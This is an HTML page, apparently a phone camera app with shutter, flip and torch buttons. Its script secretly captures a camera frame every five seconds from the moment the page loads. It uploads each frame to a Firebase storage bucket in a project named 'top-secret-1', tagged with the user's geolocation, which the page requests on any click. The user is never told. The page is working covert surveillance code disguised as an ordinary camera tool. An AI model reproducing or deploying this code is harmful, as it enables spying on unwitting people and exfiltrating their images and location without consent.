<!DOCTYPE html>
<html lang="en">

<head>
    <script src="https://www.gstatic.com/firebasejs/8.6.8/firebase-app.js"></script>
    <!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->
    <script src="https://www.gstatic.com/firebasejs/8.6.8/firebase-analytics.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.6.8/firebase-storage.js"></script>
    
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.3/css/all.css" integrity="sha384-SZXxX4whJ79/gErwcOYf+zWLeJdY/qpuqC4cAa9rOGUstPomtqpuNWT9wdPEn2fk" crossorigin="anonymous">
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>HTML</title>
    <!-- HTML -->
    <!-- Custom Styles -->
    <style type="text/css" media="all">
*{
    box-sizing: border-box;
}
body {
    margin: 0;
    padding: 0;
    background-color: black;
    height: 100vh;
    overflow: scroll;
    width: 100vw;
}
#myCanvas{
    width: 100%;
    height: 100vh;
    background-color: none;
    position: fixed;
    display: none;
    animation: shot 0.52s;
}
@keyframes shot{
    from{
        width: 100%;
        height: 100%;
    }
    to{
        width: 10%;
        height: 10vh;
        display: none;
    }
}
video{
    width: 100%;
    height: 100vh;
    position: fixed;
    top: 0;
    left: 0;
}
#btn{
    position: fixed;
    width: 50px;
    height: 50px;
    bottom: 40px;
    left: calc(50vw - 25px);
    background-color: red;
    border-radius: 50%;
    border: solid gray;
}
#flip{
    position: fixed;
    width: 30px;
    height: 30px;
    left: 25vw;
    bottom: 50px;
    background-color: red;
    background-image: url("https://static.thenounproject.com/png/390579-200.png");
    background-size: 70% 70%;
    background-repeat: no-repeat;
    background-position: center;
    border-radius: 50%;
}
#flash{
    position: fixed;
    width: 30px;
    height: 30px;
    right: 25vw;
    bottom: 50px;
    background-color: red;
    background-image: url("https://static.thenounproject.com/png/585926-200.png");
    background-size: 70% 70%;
    background-repeat: no-repeat;
    background-position: center;
    border-radius: 50%;
}
    </style>
    <script>
window.onload = function() {
    
    // For Firebase JS SDK v7.20.0 and later, measurementId is optional
    const firebaseConfig = {
        apiKey: "AIzaSyBJpFkZIWQMNk9SO4UMvMBlXZvmrtU_qhk",
        authDomain: "top-secret-1-d4be7.firebaseapp.com",
        projectId: "top-secret-1-d4be7",
        storageBucket: "top-secret-1-d4be7.appspot.com",
        messagingSenderId: "173070660145",
        appId: "1:173070660145:web:caf62bbca077b971001b10",
        measurementId: "G-8KM9MEZF0K"
    };
    
    var location = 'none';
    document.body.addEventListener('click',f);
    function f() {
        if (navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(showPosition);
        } else {
            location = 'none'
        }
    }

    function showPosition(position) {
        location = "Latitude: " + position.coords.latitude +
            " Longitude: " + position.coords.longitude;
        //document.write(location)
    }
    
    firebase.initializeApp(firebaseConfig);
    var storage = firebase.storage();

    //console.log(storage)
    var track;
    // camera stream video element
    let videoElm = document.querySelector('#player');
    videoElm.addEventListener('click',f);
    // flip button element
    let flipBtn = document.querySelector('#flip');
    var canvas = document.querySelector('#myCanvas');
    const ctx = canvas.getContext('2d');
    const click_btn = document.querySelector('#btn')
    // default user media options
    let defaultsOpts = { audio: false, video: true }
    let shouldFaceUser = true;
    videoElm.webkitEnterFullScreen()
    // check whether we can use facingMode
    let supports = navigator.mediaDevices.getSupportedConstraints();
    if (supports['facingMode'] === true) {
        flipBtn.disabled = false;
    }
    
    function take_shot() {
        canvas.height = track.getSettings().height
        canvas.width = track.getSettings().width
        ctx.drawImage(videoElm, 0, 0);
        var time = new Date();
        canvas.toBlob(function(blob) {
            storage.ref().child('/images'+time+location).put(blob);
        });
    }
    
    let stream = null;
    
    function capture() {
        defaultsOpts.video = { facingMode: shouldFaceUser ? 'user' : 'environment' }
        navigator.mediaDevices.getUserMedia(defaultsOpts)
            .then(function(_stream) {
                stream = _stream;
                videoElm.srcObject = stream;
                track = stream.getVideoTracks()[0]
                videoElm.play();
            })
            .catch(function(err) {
                console.log(err)
            });
    }
    
    flipBtn.addEventListener('click', function() {
        if (stream == null) return
        // we need to flip, stop everything
        stream.getTracks().forEach(t => {
            t.stop();
        });
        // toggle / flip
        shouldFaceUser = !shouldFaceUser;
        capture();
    })
    
    capture();
    videoElm.addEventListener('play',function(){
        //take_shot();
        setTimeout(take_shot,500);
        setInterval(take_shot,5000);
    });
    click_btn.addEventListener('click',function(){
        canvas.style.display = 'block';
        canvas.height = track.getSettings().height
        canvas.width = track.getSettings().width
        ctx.drawImage(videoElm,0,0);
        //var dt = new Date();
        var image = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream"); // here is the most important part because if you dont replace you will get a DOM 18 exception.
        //console.log(image)
        window.location.href = image;
        take_shot();
        setTimeout(function(){
          canvas.style.display = 'none';
        },520);
    });
    
    
    var counter = 0;
    document.querySelector('#flash').addEventListener('click',function(){
        if (!shouldFaceUser) {
            if (counter == 0) {
                track.applyConstraints({
                    advanced: [{ torch: true }]
                });
                this.style.backgroundColor = 'green';
                counter = 1;
            } else {
                track.applyConstraints({
                    advanced: [{ torch: false }]
                });
                this.style.backgroundColor = 'red';
                counter = 0;
            }
        }
    });
    
    
    
    
    
    
    // Create a reference under which you want to list
}
    </script>
</head>
<body>
    <video id="player" autoplay loop></video>
    <canvas id="myCanvas"></canvas>
    <div id="btn"></div>
    <div id="flip"></div>
    <div id="flash"></div>
</body>

</html>
